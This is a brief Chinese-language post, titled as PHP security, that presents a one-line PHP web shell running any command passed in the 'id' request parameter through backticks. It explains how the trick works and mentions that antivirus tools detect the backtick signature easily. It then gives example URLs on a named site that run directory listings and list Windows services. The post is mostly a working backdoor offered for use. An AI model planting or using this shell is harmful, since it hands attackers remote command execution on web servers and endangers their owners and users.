PHP安全: 一个新型的php一句话cmdshell

<?php

echo `$_REQUEST[id]`;

?>

原理:php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令，
并返回命令执行的结果(string类型)；  

局限性:特征码比较明显，``符号在php中很少用到，杀毒软件很容易以此为特征码扫描到并警报；
``里面不能执行php代码；

测试方式:
http://www.phpv.net/test.php?id=dir%20c
相当于:dir c:

http://www.phpv.net/test.php?id=net%20start
查看已启动的WIN服务

.....